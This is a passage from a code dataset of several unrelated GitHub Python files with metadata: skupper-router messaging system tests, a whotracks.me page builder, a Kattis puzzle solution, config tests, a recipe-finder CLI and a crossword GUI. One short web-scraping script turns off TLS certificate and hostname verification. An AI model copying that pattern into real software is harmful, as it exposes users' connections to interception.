self.test.assertTrue(remote_state.failed)\n self.test.assertFalse(remote_state.undeliverable)\n self.test.assertTrue(remote_state.annotations is None)\n\n def run(self):\n Container(self).run()\n\n\nclass PropagatedDispositionData(PropagatedDisposition):\n \"\"\"\n Verify that data associated with a terminal outcome is correctly passed end\n to end\n \"\"\"\n\n def set_rejected_data(self, local_state):\n local_state.condition = Condition(\"name\",\n str(\"description\"),\n {symbol(\"info\"): True})\n\n def check_rejected_data(self, remote_state):\n cond = remote_state.condition\n self.test.assertEqual(\"name\", cond.name)\n self.test.assertEqual(\"description\", cond.description)\n self.test.assertTrue(cond.info is not None)\n self.test.assertTrue(symbol(\"info\") in cond.info)\n self.test.assertEqual(True, cond.info[symbol(\"info\")])\n\n def set_modified_data(self, local_state):\n local_state.failed = True\n local_state.undeliverable = True\n local_state.annotations = {symbol('modified'): True}\n\n def check_modified_data(self, remote_state):\n self.test.assertTrue(remote_state.failed)\n self.test.assertTrue(remote_state.undeliverable)\n self.test.assertTrue(remote_state.annotations is not None)\n self.test.assertTrue(symbol('modified') in remote_state.annotations)\n self.test.assertEqual(True, remote_state.annotations[symbol('modified')])\n\n\nclass ThreeAck(MessagingHandler):\n def __init__(self, test, address1, address2):\n super(ThreeAck, self).__init__(auto_accept=False, auto_settle=False)\n self.addrs = [address1, address2]\n self.settled = []\n self.test = test\n self.phase = 0\n\n def on_start(self, event):\n connections = [event.container.connect(a) for a in self.addrs]\n addr = \"three_ack/1\"\n self.sender = event.container.create_sender(connections[0], addr)\n self.receiver = event.container.create_receiver(connections[1], addr)\n self.receiver.flow(1)\n self.tracker = self.sender.send(Message('hello'))\n\n def on_message(self, event):\n self.test.assertEqual(0, self.phase)\n self.phase = 1\n self.test.assertFalse(event.delivery.settled)\n self.test.assertEqual(0, self.tracker.local_state)\n self.test.assertEqual(0, self.tracker.remote_state)\n event.delivery.update(Delivery.ACCEPTED)\n # NOTE: we don't settle yet for 3-ack\n\n def on_accepted(self, event):\n self.test.assertTrue(event.sender)\n self.test.assertEqual(1, self.phase)\n self.phase = 2\n self.test.assertEqual(Delivery.ACCEPTED, event.delivery.remote_state)\n self.test.assertFalse(event.delivery.settled)\n self.test.assertEqual(0, event.delivery.local_state)\n event.delivery.settle()\n self.test.assertFalse(event.delivery.settled)\n event.connection.close()\n\n def on_settled(self, event):\n self.test.assertTrue(event.receiver)\n self.test.assertEqual(2, self.phase)\n self.phase = 3\n event.connection.close()\n\n def run(self):\n Container(self).run()\n self.test.assertEqual(3, self.phase)\n\n\nclass TwoRouterConnection(TestCase):\n def setUp(self):\n super().setUp()\n self.success = False\n self.timer_delay = 4\n self.max_attempts = 2\n self.attempts = 0\n self.local_node = None\n\n @classmethod\n def router(cls, name, config):\n config = Qdrouterd.Config(config)\n\n cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))\n\n @classmethod\n def setUpClass(cls):\n super(TwoRouterConnection, cls).setUpClass()\n\n cls.routers = []\n\n cls.B_normal_port_1 = cls.tester.get_port()\n cls.B_normal_port_2 = cls.tester.get_port()\n\n TwoRouterConnection.router('A', [\n ('router', {'mode': 'interior', 'id': 'A'}),\n ('listener', {'host': '0.0.0.0', 'role': 'normal',\n 'port': cls.tester.get_port()}),\n ]\n )\n\n TwoRouterConnection.router('B',\n [\n ('router', {'mode': 'interior', 'id': 'B'}),\n ('listener', {'host': '0.0.0.0', 'role': 'normal',\n 'port': cls.B_normal_port_1}),\n ('listener', {'host': '0.0.0.0', 'role': 'normal',\n 'port': cls.B_normal_port_2}),\n\n ]\n )\n\n def address(self):\n return self.routers[0].addresses[0]\n\n def run_skmanage(self, cmd, input=None, expect=Process.EXIT_OK, address=None):\n p = self.popen(\n ['skmanage'] + cmd.split(' ') + ['--bus', address or self.address(), '--indent=-1', '--timeout', str(TIMEOUT)],\n stdin=PIPE, stdout=PIPE, stderr=STDOUT, expect=expect,\n universal_newlines=True)\n out = p.communicate(input)[0]\n try:\n p.teardown()\n except Exception as e:\n raise Exception(out if out else str(e))\n return out\n\n def can_terminate(self):\n if self.attempts == self.max_attempts:\n return True\n\n if self.success:\n return True\n\n return False\n\n def check_connections(self):\n res = self.local_node.query(type=CONNECTION_TYPE)\n results = res.results\n\n # If DISPATCH-1093 was not fixed, there would be an additional\n # connection created and hence the len(results) would be 4\n\n # Since DISPATCH-1093 is fixed, len(results would be 3 which is what\n # we would expect.\n if len(results) != 3:\n self.schedule_num_connections_test()\n else:\n self.success = True\n\n def schedule_num_connections_test(self):\n if self.attempts < self.max_attempts:\n if not self.success:\n Timer(self.timer_delay, self.check_connections).start()\n self.attempts += 1\n\n def test_create_connectors(self):\n self.local_node = Node.connect(self.routers[0].addresses[0],\n timeout=TIMEOUT)\n\n res = self.local_node.query(type=CONNECTION_TYPE)\n results = res.results\n self.assertEqual(1, len(results))\n\n create_command = 'CREATE --type=' + AMQP_CONNECTOR_TYPE + ' --name=foo' + ' host=0.0.0.0 port=' + str(TwoRouterConnection.B_normal_port_1)\n\n self.run_skmanage(create_command)\n\n create_command = 'CREATE --type=' + AMQP_CONNECTOR_TYPE + ' --name=bar' + ' host=0.0.0.0 port=' + str(TwoRouterConnection.B_normal_port_2)\n\n self.run_skmanage(create_command)\n\n self.schedule_num_connections_test()\n\n while not self.can_terminate():\n pass\n\n self.assertTrue(self.success)\n\n\nclass PropagationTest(TestCase):\n\n inter_router_port = None\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Start a router and a messenger\"\"\"\n super(PropagationTest, cls).setUpClass()\n\n def router(name, extra_config):\n\n config = [\n ('router', {'mode': 'interior', 'id': 'QDR.%s' % name}),\n\n ('listener', {'port': cls.tester.get_port()}),\n\n ] + extra_config\n\n config = Qdrouterd.Config(config)\n\n cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))\n\n cls.routers = []\n\n inter_router_port = cls.tester.get_port()\n router('A', [('listener', {'role': 'inter-router', 'port': inter_router_port}), ('address', {'prefix': 'multicast', 'distribution': 'multicast'})])\n router('B', [('connector', {'role': 'inter-router', 'port': inter_router_port})])\n\n cls.routers[0].wait_router_connected('QDR.B')\n cls.routers[1].wait_router_connected('QDR.A')\n\n def test_propagation_of_locally_undefined_address(self):\n test = MulticastTestClient(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n self.assertEqual(test.received, 2)\n\n\nclass CreateReceiver(MessagingHandler):\n def __init__(self, connection, address):\n super(CreateReceiver, self).__init__()\n self.connection = connection\n self.address = address\n\n def on_timer_task(self, event):\n event.container.create_receiver(self.connection, self.address)\n\n\nclass DelayedSend(MessagingHandler):\n def __init__(self, connection, address, message):\n super(DelayedSend, self).__init__()\n self.connection = connection\n self.address = address\n self.message = message\n\n def on_timer_task(self, event):\n event.container.create_sender(self.connection, self.address).send(self.message)\n\n\nclass MulticastTestClient(MessagingHandler):\n def __init__(self, router1, router2):\n super(MulticastTestClient, self).__init__()\n self.routers = [router1, router2]\n self.received = 0\n self.error = None\n\n def on_start(self, event):\n self.connections = [event.container.connect(r) for r in self.routers]\n event.container.create_receiver(self.connections[0], \"multicast\")\n # wait for knowledge of receiver1 to propagate to second router\n event.container.schedule(5, CreateReceiver(self.connections[1], \"multicast\"))\n event.container.schedule(7, DelayedSend(self.connections[1], \"multicast\", Message(body=\"testing1,2,3\")))\n self.timer = event.reactor.schedule(TIMEOUT, TestTimeout(self))\n\n def on_message(self, event):\n self.received += 1\n event.connection.close()\n if self.received == 2:\n self.timer.cancel()\n\n def timeout(self):\n self.error = \"Timeout Expired:received=%d\" % self.received\n for c in self.connections:\n c.close()\n\n def run(self):\n Container(self).run()\n\n\nclass StreamingLinkScrubberTest(TestCase):\n \"\"\"\n Verify that unused inter-router streaming links are eventually reclaimed\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(StreamingLinkScrubberTest, cls).setUpClass()\n\n def router(name, extra):\n config = [\n ('router', {'id': 'Router%s' % name,\n 'mode': 'interior', 'dataConnectionCount': '0'}),\n ('listener', {'port': cls.tester.get_port()}),\n ('address', {'prefix': 'closest', 'distribution': 'closest'}),\n ('address', {'prefix': 'balanced', 'distribution': 'balanced'}),\n ('address', {'prefix': 'multicast', 'distribution': 'multicast'})\n\n ]\n\n if extra:\n config.extend(extra)\n\n config = Qdrouterd.Config(config)\n\n # run routers in test mode to shorten the streaming link scrubber\n # interval to 5 seconds an the maximum pool size to two links\n cls.routers.append(cls.tester.qdrouterd(name, config, wait=True, cl_args=[\"--test-hooks\"]))\n\n cls.routers = []\n inter_router_port = cls.tester.get_port()\n\n router('A',\n [('listener', {'role': 'inter-router',\n 'port': inter_router_port})])\n cls.RouterA = cls.routers[-1]\n cls.RouterA.listener = cls.RouterA.addresses[0]\n\n router('B',\n [('connector', {'name': 'connectorToA', 'role':\n 'inter-router',\n 'port': inter_router_port})])\n cls.RouterB = cls.routers[-1]\n cls.RouterB.listener = cls.RouterB.addresses[0]\n cls.RouterA.wait_router_connected('RouterB')\n cls.RouterB.wait_router_connected('RouterA')\n\n def test_01_streaming_link_scrubber(self):\n \"\"\"\n Ensure extra streaming links are closed by the periodic scrubber\n \"\"\"\n address = \"closest/scrubber\"\n\n # scrubber removes at most 10 links per scan, the test pool size is 2\n sender_count = 12\n\n # fire up a receiver on RouterB to get 1 message from each sender:\n env = dict(os.environ, PN_TRACE_FRM=\"1\")\n cmd = [\"test-receiver\",\n \"-a\", self.RouterB.listener,\n \"-s\", address,\n \"-c\", str(sender_count),\n \"-d\"]\n rx = self.popen(cmd, env=env)\n\n self.RouterA.wait_address(address)\n\n # remember the count of inter-router links on A before we start streaming\n pre_count = len(get_inter_router_links(self.RouterA.listener))\n\n # fire off the senders\n cmd = [\"test-sender\",\n \"-a\", self.RouterA.listener,\n \"-t\", address,\n \"-c\", \"1\",\n \"-sx\",\n \"-d\"\n ]\n senders = [self.popen(cmd, env=env) for x in range(sender_count)]\n\n for tx in senders:\n tx.wait(timeout=TIMEOUT)\n\n # expect: more inter-router links opened. Should be 12 more, but\n # depending on when the scrubber runs it may be as low as two\n post_count = len(get_inter_router_links(self.RouterA.listener))\n self.assertGreater(post_count, pre_count)\n\n # expect: after 5 seconds 10 of the links should be closed and 2 should\n # remain (--test-hooks router option sets these parameters, see streaming_link_scrubber.c)\n self.assertTrue(retry(lambda pc=pre_count, ra=self.RouterA.listener:\n len(get_inter_router_links(ra)) - pc == 2,\n delay=0.25),\n f\"{len(get_inter_router_links(self.RouterA.listener)) - pre_count} != 2\")\n rx.wait(timeout=TIMEOUT)\n\n\nclass TwoRouterExtensionStateTest(TestCase):\n \"\"\"\n Verify that routers propagate extended Disposition state correctly.\n See DISPATCH-1703\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(TwoRouterExtensionStateTest, cls).setUpClass()\n\n def router(name, extra_config):\n\n config = [\n ('router', {'mode': 'interior',\n 'id': name}),\n\n ('listener', {'port': cls.tester.get_port()}),\n\n ('address', {'prefix': 'closest', 'distribution': 'closest'}),\n ('address', {'prefix': 'balanced', 'distribution': 'balanced'}),\n ('address', {'prefix': 'multicast', 'distribution': 'multicast'}),\n ] + extra_config\n\n config = Qdrouterd.Config(config)\n return cls.tester.qdrouterd(name, config, wait=False)\n\n inter_router_port = cls.tester.get_port()\n service_port = cls.tester.get_port()\n\n cls.RouterA = router('RouterA',\n [\n ('listener', {'role': 'inter-router',\n 'host': '0.0.0.0',\n 'port': inter_router_port,\n 'saslMechanisms': 'ANONYMOUS'}),\n ])\n\n cls.RouterB = router('RouterB',\n [\n ('connector', {'name': 'toRouterA',\n 'role': 'inter-router',\n 'port': inter_router_port}),\n ('listener', {'role': 'route-container',\n 'host': '0.0.0.0',\n 'port': service_port,\n 'saslMechanisms': 'ANONYMOUS'}),\n ])\n\n cls.RouterA.wait_router_connected('RouterB')\n cls.RouterB.wait_router_connected('RouterA')\n\n def test_02_closest(self):\n \"\"\"\n Verify non-terminal state and data propagates over anycase\n \"\"\"\n test = ExtensionStateTester(self.RouterA.addresses[0],\n self.RouterB.addresses[0],\n \"closest/fleabag\")\n test.run()\n self.assertIsNone(test.error)\n\n def test_03_multicast(self):\n \"\"\"\n Verify that disposition state set by the publisher is available to all\n consumers\n \"\"\"\n rxs = [MyExtendedReceiver(self.RouterA.addresses[0],\n \"multicast/thingy\")\n for x in range(3)]\n self.RouterA.wait_address(\"multicast/thingy\", subscribers=3)\n sleep(0.5) # let subscribers grant credit\n tx = MyExtendedSender(self.RouterB.addresses[0],\n \"multicast/thingy\")\n tx.wait()\n\n # DISPATCH-1705: only one of the receivers gets the data, but all\n # should get the state\n\n ext_data = None\n for rx in rxs:\n rx.stop()\n try:\n while True:\n dispo = rx.remote_states.pop()\n self.assertEqual(999, dispo[0])\n ext_data = dispo[1] or ext_data\n except IndexError:\n pass\n self.assertEqual([1, 2, 3], ext_data)\n\n\nclass MyExtendedSender(AsyncTestSender):\n \"\"\"\n This sender sets a non-terminal outcome and data on the outgoing\n transfer\n \"\"\"\n\n def on_sendable(self, event):\n if self.sent < self.total:\n dlv = event.sender.delivery(str(self.sent))\n dlv.local.data = [1, 2, 3]\n dlv.update(999)\n event.sender.stream(self._message.encode())\n event.sender.advance()\n self.sent += 1\n\n\nclass MyExtendedReceiver(AsyncTestReceiver):\n \"\"\"\n This receiver stores any remote delivery state that arrives with a message\n transfer\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.remote_states = []\n super(MyExtendedReceiver, self).__init__(*args, **kwargs)\n\n def on_message(self, event):\n self.remote_states.append((event.delivery.remote_state,\n event.delivery.remote.data))\n super(MyExtendedReceiver, self).on_message(event)\n\n\nclass ExtensionStateTester(MessagingHandler):\n \"\"\"\n Verify the routers propagate non-terminal outcome and extended state\n disposition information in both message transfer and disposition frames.\n\n This tester creates a receiver and a sender link to a given address.\n\n The sender transfers a message with a non-terminal delivery state and\n associated extension data. The receiver expects to find this state in the\n incoming delivery.\n\n The receiver then responds with a non-terminal disposition that also has\n extension state data. The sender expects to find this new state associated\n with its delivery.\n \"\"\"\n\n def __init__(self, ingress_router, egress_router, address):\n super(ExtensionStateTester, self).__init__(auto_settle=False,\n auto_accept=False)\n self._in_router = ingress_router\n self._out_router = egress_router\n self._address = address\n self._sender_conn = None\n self._recvr_conn = None\n self._sender = None\n self._receiver = None\n self._sent = 0\n self._received = 0\n self._settled = 0\n self._total = 10\n self._message = Message(body=\"XYZ\" * (1024 * 1024 * 2))\n self.error = None\n\n def on_start(self, event):\n self._reactor = event.reactor\n self._sender_conn = event.container.connect(self._in_router)\n self._sender = event.container.create_sender(self._sender_conn,\n target=self._address,\n name=\"ExtensionSender\")\n self._recvr_conn = event.container.connect(self._out_router)\n self._receiver = event.container.create_receiver(self._recvr_conn,\n source=self._address,\n name=\"ExtensionReceiver\")\n\n def _done(self, error=None):\n self.error = error or self.error\n self._sender.close()\n self._sender_conn.close()\n self._receiver.close()\n self._recvr_conn.close()\n\n def on_sendable(self, event):\n if self._sent < self._total:\n self._sent += 1\n dlv = event.sender.delivery(str(self._sent))\n dlv.local.data = [1, 2, 3, self._sent]\n dlv.update(666) # non-terminal state\n self._message.id = self._sent\n event.sender.stream(self._message.encode())\n event.sender.advance()\n\n def on_message(self, event):\n dlv = event.delivery\n msg_id = event.message.id\n if dlv.remote_state != 666:\n return self._done(error=\"Unexpected outcome '%s', expected '666'\"\n % dlv.remote_state)\n remote_data = dlv.remote.data\n expected_data = [1, 2, 3, msg_id]\n if remote_data != expected_data:\n return self._done(error=\"Unexpected dispo data '%s', expected '%s'\"\n % (remote_data, expected_data))\n\n # send back a non-terminal outcome and more data\n dlv.local.data = [10, 9, 8, msg_id]\n dlv.update(777)\n self._received += 1\n\n def _handle_sender_update(self, event):\n dlv = event.delivery\n if dlv.local_state != 666 or len(dlv.local.data) != 4:\n return self._done(error=\"Unexpected local state at sender: %s %s\" %\n (dlv.local_state, dlv.local.data))\n\n if dlv.remote_state != 777 or len(dlv.remote.data) != 4:\n return self._done(error=\"Unexpected remote state at sender: %s %s\" %\n (dlv.remote_state, dlv.remote.data))\n dlv.settle()\n\n def _handle_receiver_update(self, event):\n dlv = event.delivery\n if dlv.settled:\n if dlv.local_state != 777 or len(dlv.local.data) != 4:\n return self._done(error=\"Unexpected local state at sender: %s %s\" %\n (dlv.local_state, dlv.local.data))\n\n if dlv.remote_state != 666 or len(dlv.remote.data) != 4:\n return self._done(error=\"Unexpected remote state at sender: %s %s\" %\n (dlv.remote_state, dlv.remote.data))\n dlv.settle()\n self._settled += 1\n if self._settled == self._total:\n self._done()\n\n def on_delivery(self, event):\n if event.delivery.link.is_sender:\n self._handle_sender_update(event)\n else:\n self._handle_receiver_update(event)\n\n def run(self):\n Container(self).run()\n\n\nif __name__ == '__main__':\n unittest.main(main_module())\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/system_tests_two_routers.py","file_name":"system_tests_two_routers.py","file_ext":"py","file_size_in_byte":71782,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"7840874558","text":"\nfrom jinja2 import Markup\n\nfrom whotracksme.website.plotting.companies import overview_bars\n\nfrom whotracksme.website.build.websites import tracked_by_category\nfrom whotracksme.website.build.companies import company_reach\nfrom whotracksme.website.utils import print_progress\nfrom whotracksme.website.templates import (\n get_template,\n render_template,\n)\n\n\ndef build_home(data):\n apps = data.apps\n\n sorted_trackers = sorted(apps.values(), key=lambda a: a['overview']['reach'], reverse=True)\n sorted_trackers_cat = sorted(apps.values(), key=lambda a: a.get('cat', '') or '')\n\n for tracker in sorted_trackers:\n if 'name' not in tracker:\n tracker['name'] = tracker['overview']['id']\n\n for tracker in sorted_trackers_cat:\n if 'name' not in tracker:\n tracker['name'] = tracker['overview']['id']\n\n # most tracked sites by cat\n most_tracked_sites = tracked_by_category(data.sites, worst=True)\n # least tracked sites by cat\n least_tracked_sites = tracked_by_category(data.sites, worst=False)\n\n top10 = company_reach(data.companies)\n header_graph = Markup(overview_bars(top10))\n\n with open('_site/index.html', 'w') as output:\n output.write(render_template(\n template=get_template(data, \"index.html\"),\n ts=header_graph,\n tracker_list=sorted_trackers[:20],\n trackers_list_cat=sorted_trackers_cat[:20],\n most_tracked_sites=most_tracked_sites,\n least_tracked_sites=least_tracked_sites\n ))\n\n print_progress(text=\"Generate home page\")\n","repo_name":"valerymamontov/whotracks.me","sub_path":"whotracksme/website/build/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"26280711580","text":"\"\"\"Fun House\"\"\"\n\n# funhouse\n\n\ndef beam(x, y, direction, image):\n \"\"\"Find full beam path\"\"\"\n reflections = {\n (0, 1): {\"\\\\\": (1, 0), \"/\": (-1, 0)},\n (0, -1): {\"\\\\\": (-1, 0), \"/\": (1, 0)},\n (-1, 0): {\"\\\\\": (0, -1), \"/\": (0, 1)},\n (1, 0): {\"\\\\\": (0, 1), \"/\": (0, -1)},\n }\n\n while True:\n while house[y][x] not in \"\\\\/x\":\n x, y = x + direction[0], y + direction[1]\n\n if image[y][x] == \"x\":\n image[y][x] = \"&\"\n return image\n\n direction = reflections[direction][image[y][x]]\n x, y = x + direction[0], y + direction[1]\n\n\ncounter = 1\n\nwhile True:\n house = []\n X, Y = [int(x) for x in input().split()]\n\n if X + Y == 0:\n break\n\n for i in range(Y):\n line = list(input())\n\n if \"*\" in line:\n start = [line.index(\"*\"), i]\n\n house.append(line)\n\n if start[1] == 0:\n orientation = (0, 1)\n elif start[1] == Y - 1:\n orientation = (0, -1)\n elif start[0] == 0:\n orientation = (1, 0)\n elif start[0] == X - 1:\n orientation = (-1, 0)\n\n beam(*start, orientation, house)\n\n print(\"HOUSE\", counter)\n\n for row in house:\n print(\"\".join(row))\n\n counter += 1\n","repo_name":"lukaszlukaszew/kattis-solutions","sub_path":"F/funhouse.py","file_name":"funhouse.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72448659932","text":"from pathlib import Path\nimport tempfile\n\nimport pytest\n\nfrom mallennlp.domain.config import ProjectConfig, ServerConfig\nfrom mallennlp.services.config import Config\nfrom mallennlp.exceptions import NotInProjectError\n\n\n@pytest.fixture(scope=\"function\")\ndef tmpdir():\n with tempfile.TemporaryDirectory() as _tmpdirname:\n yield Path(_tmpdirname)\n\n\n@pytest.fixture(scope=\"function\")\ndef project_path(tmpdir):\n with open(tmpdir / Config.CONFIG_PATH, \"w\") as config_file:\n config_file.write(\n \"[project]\\n\" 'name = \"my-project\"\\n' \"\\n\" \"[server]\\n\" \"port = 5000\\n\"\n )\n yield tmpdir\n\n\ndef test_from_toml_raises(tmpdir):\n with pytest.raises(NotInProjectError):\n Config.from_toml(tmpdir)\n\n\ndef test_from_toml(project_path):\n config = Config.from_toml(project_path)\n assert config.project.name == \"my-project\"\n assert config.server.port == 5000\n\n\ndef test_to_toml(tmpdir):\n config = Config(\n ProjectConfig(tmpdir, name=\"my-test-project\"), ServerConfig(tmpdir, port=8888)\n )\n config.to_toml(tmpdir)\n config = Config.from_toml(tmpdir)\n assert config.project.name == \"my-test-project\"\n assert config.server.port == 8888\n","repo_name":"epwalsh/allennlp-manager","sub_path":"mallennlp/tests/services/config_test.py","file_name":"config_test.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"2132229097","text":"import urllib.request,urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input(\"Enter url: \")\nx = 0\ncount = int(input(\"Enter count: \"))\npos = int(input(\"Enter position: \"))\nprint(\"Retriving: \" + url)\nwhile x < count:\n\thtml = urllib.request.urlopen(url, context=ctx).read()\n\tsoup = BeautifulSoup(html, \"html.parser\")\n\tnum = []\n\ttags = soup(\"a\")\n\tfor tag in tags:\n\t\tnum.append(tag.get('href', None))\n\turl = num[pos-1]\n\tprint(\"Retrieving: \" + url)\n\tx+=1\n\n\n","repo_name":"jess-sickles/HW6","sub_path":"partB.py","file_name":"partB.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71292642330","text":"# -*- coding: utf-8 -*-\n\nfrom flask import g\n\nfrom zaih_core.api_errors import NotFound, BadRequest\nfrom zaih_core.pager import get_offset_limit\n\nfrom sub.models import Post, Column, Member\n\nfrom . import Resource\n\n\nclass ColumnsIdPosts(Resource):\n\n def get(self, id):\n query = (\n Post.query\n .filter(~Post.is_hidden)\n .filter(Post.column_id == id)\n .filter(Post.review_status.in_(Post.PUBLIC_REVIEW_STATUSES)))\n count = query.count()\n offset, limit = get_offset_limit(g.args)\n posts = (\n query\n .order_by(Post.is_sticky.desc())\n .order_by(Post.date_updated.desc())\n .offset(offset)\n .limit(limit)\n .all())\n return posts, 200, [('Total-Count', str(count))]\n\n def post(self, id):\n column = (\n Column.query\n .filter(Column.id == id)\n .filter(~Column.is_hidden)\n .filter(Column.review_status.in_(Column.PUBLIC_REVIEW_STATUSES))\n .filter(Column.status == Column.STATUS_PUBLISHED)\n .first())\n if not column:\n raise NotFound('column_not_found')\n member = (\n Member.query\n .filter(Member.column_id == column.id)\n .filter(Member.account_id == g.account.id)\n .first())\n if not member:\n raise BadRequest('not_subscribe_column')\n g.json.update(\n account_id=g.account.id,\n column_id=column.id,\n review_status=Post.REVIEW_STATUS_AUTO_PASSED)\n post = Post.create(**g.json)\n return post, 201\n","repo_name":"cash2one/fang","sub_path":"sub/v1/api/columns_id_posts.py","file_name":"columns_id_posts.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3424478288","text":"# Proposto pelo Guanabara, sem usar uma lista\n#primeiro declara variaveis maior e menor inicializando com um número, no caso o 0\nmaior = 0\nmenor = 0\nfor i in range(1, 6):\n peso = float(input('Digite o peso (Kg) da {}ª pessoa: '.format(i)))\n if i == 1:\n maior = peso\n menor = peso\n # pois para o primeiro valor dado, ele é o maior e o menor, dado que não tem outros valores!\n else:\n if peso > maior:\n maior = peso\n if peso < menor:\n menor = peso\n # o menor e o maior peso vão estar alocados com um valor (das interações anteriores), então ele checa\n # se o novo valor é maior ou menor do que o que está alocado, caso seja ele substitui.\nprint('\\033[1;35mO maior peso digitado é: {}\\033[m'.format(maior))\nprint('\\033[1;33mO menor peso digitado é: {}\\033[m'.format(menor))\n\n","repo_name":"borgesgfj/python_basic_exercises","sub_path":"exerc55b.py","file_name":"exerc55b.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8990290044","text":"\"\"\"Utility functions for the project.\"\"\"\nfrom typing import Callable, List\n\nfrom pyparrot import Bebop\n\nfrom configs import load\n\n\ndef takeoff() -> List[Callable, int]:\n \"\"\"Takeoff the drone to a given height.\n\n Returns\n -------\n List[Callable, int]\n A list of the drone and the height.\n \"\"\"\n # initialize the drone\n bebop = Bebop()\n\n # connect to the drone\n bebop.connect(10)\n\n # for indoor safety\n bebop.set_max_tilt(5) # 5 degrees\n bebop.set_max_vertical_speed(1) # 1 m/s\n bebop.set_hull_protection(1) # 1 = on, 0 = off\n\n # take off\n height: int = load(key=\"takeoff altitude\")\n bebop.safe_takeoff(height)\n\n return [bebop, height]\n","repo_name":"alibustami/pyparrot-control-using-hand-gesture","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33239351614","text":"import os\r\nimport time\r\nimport sys\r\nimport recipefinder\r\n\r\ndef display_app_name():\r\n \"\"\"Clears the terminal screen, and displays a title bar.\"\"\"\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n \r\n print(\"***********************************\")\r\n print(\"**** Aruna's Recipe Finder! ****\")\r\n print(\"***********************************\")\r\n print(\"\\nWelcome!! Want to find tasty, tasty recipes?\")\r\n print(\"Tell me what ingredients you have at home. I will hook you up with an awesome recipe!\\n\")\r\n \r\n\r\nuserinput = ''\r\ningredients = []\r\nrecipe_finder = recipefinder.SpoonacularRecipeFinder()\r\nwhile userinput != 'S': \r\n try: \r\n display_app_name()\r\n \r\n print(\"What do you want me to do?\")\r\n print(\"* Press 1 to Find a Recipe\")\r\n print(\"* Press 2 to Show Shopping List\")\r\n print(\"* Press S to Stop me\")\r\n \r\n userinput = input(\"\\nTake your pick: \")\r\n \r\n #Respond to the user's choice\r\n if userinput == '1':\r\n print(\"\\nLet's find you something yummy\")\r\n useringredients = input(\"\\nWhat ingredients do you have at home? (Enter a comma-separated list):\\n\")\r\n recipe_finder.find_recipe(useringredients)\r\n elif userinput == '2':\r\n recipe_finder.show_shopping_list()\r\n elif userinput == 'S':\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n print(\"\\nEnjoy your meal. Bye!!\")\r\n else:\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n print(r\"Sorry, I'm programmed to do only 2 things ¯\\_('')_/¯ \")\r\n print(\"Let's try again\")\r\n time.sleep(5)\r\n except ValueError as error:\r\n print(error)\r\n print(\"\\nLet's try again\")\r\n time.sleep(5)\r\n except:\r\n print(\"Oops! I hit some unexpected issue. Please start me again.\\n\", sys.exc_info()[0])\r\n raise\r\n\r\n\r\n","repo_name":"arunamanjunath/recipefinder","sub_path":"startapp.py","file_name":"startapp.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3470536558","text":"import tkinter as tk\nimport numpy as np\nfrom tkinter import ttk\nfrom collections import defaultdict\n\nmy_path = r'C:\\Users\\Horace.000\\eclipse-workspace\\Python_Project_6_Online_Courses\\00_ALL\\GUI\\Crosswords\\words.txt'\n\n\nclass CrosswordGrid:\n global my_path\n def __init__(self, mask):\n self.window = tk.Tk()\n self.window.title(\"Crossword\")\n self.window.geometry('900x900+400+50')\n self.mask = mask\n self.cells_arr = np.empty(shape=(len(mask), len(mask[0])), dtype = tk.Entry) # array with cells (objects of class Entry)\n self.mask_dict = {} # dictionary with values from mask\n \n # Create some room around all the internal frames\n self.window['padx'] = 5\n self.window['pady'] = 5\n\n # Declaring string variables for storing the input strings\n self.input_fields_arr = np.empty(shape=(len(mask), len(mask[0])), dtype = tk.StringVar)\n for i in range(len(mask)):\n for j in range(len(mask[0])):\n self.input_fields_arr[i][j] = tk.StringVar() \n \n # self.create_frames_for_labels_and_entry_fields_and_buttons()\n # self.create_labels()\n # self.create_cells()\n # self.create_buttons()\n \n self.list_of_words = self.read_words_from_file(my_path)\n self.dict_of_words = self.convert_list_into_dict(self.list_of_words)\n \n def grid_dimensions(self):\n self.mask = [list(item) for item in self.mask]\n self.mask_arr = np.array(self.mask)\n \n self.rows = len(self.mask_arr)\n self.columns = len(self.mask_arr[0])\n \n return self.rows, self.columns, self.mask_arr\n\n \n def create_frames_for_labels_and_entry_fields_and_buttons(self):\n self.frame_h = tk.Frame(self.window, relief=tk.RIDGE) # the frame for horizontal labels\n self.frame_v = tk.Frame(self.window, relief=tk.RIDGE) # the frame for vertical labels\n self.frame_c = tk.Frame(self.window, relief=tk.RIDGE) # the frame for cells in grid\n self.frame_b = tk.Frame(self.window, relief=tk.RIDGE) # the frame for buttons\n \n self.frame_h.grid(row=0, column=1)\n self.frame_v.grid(row=1, 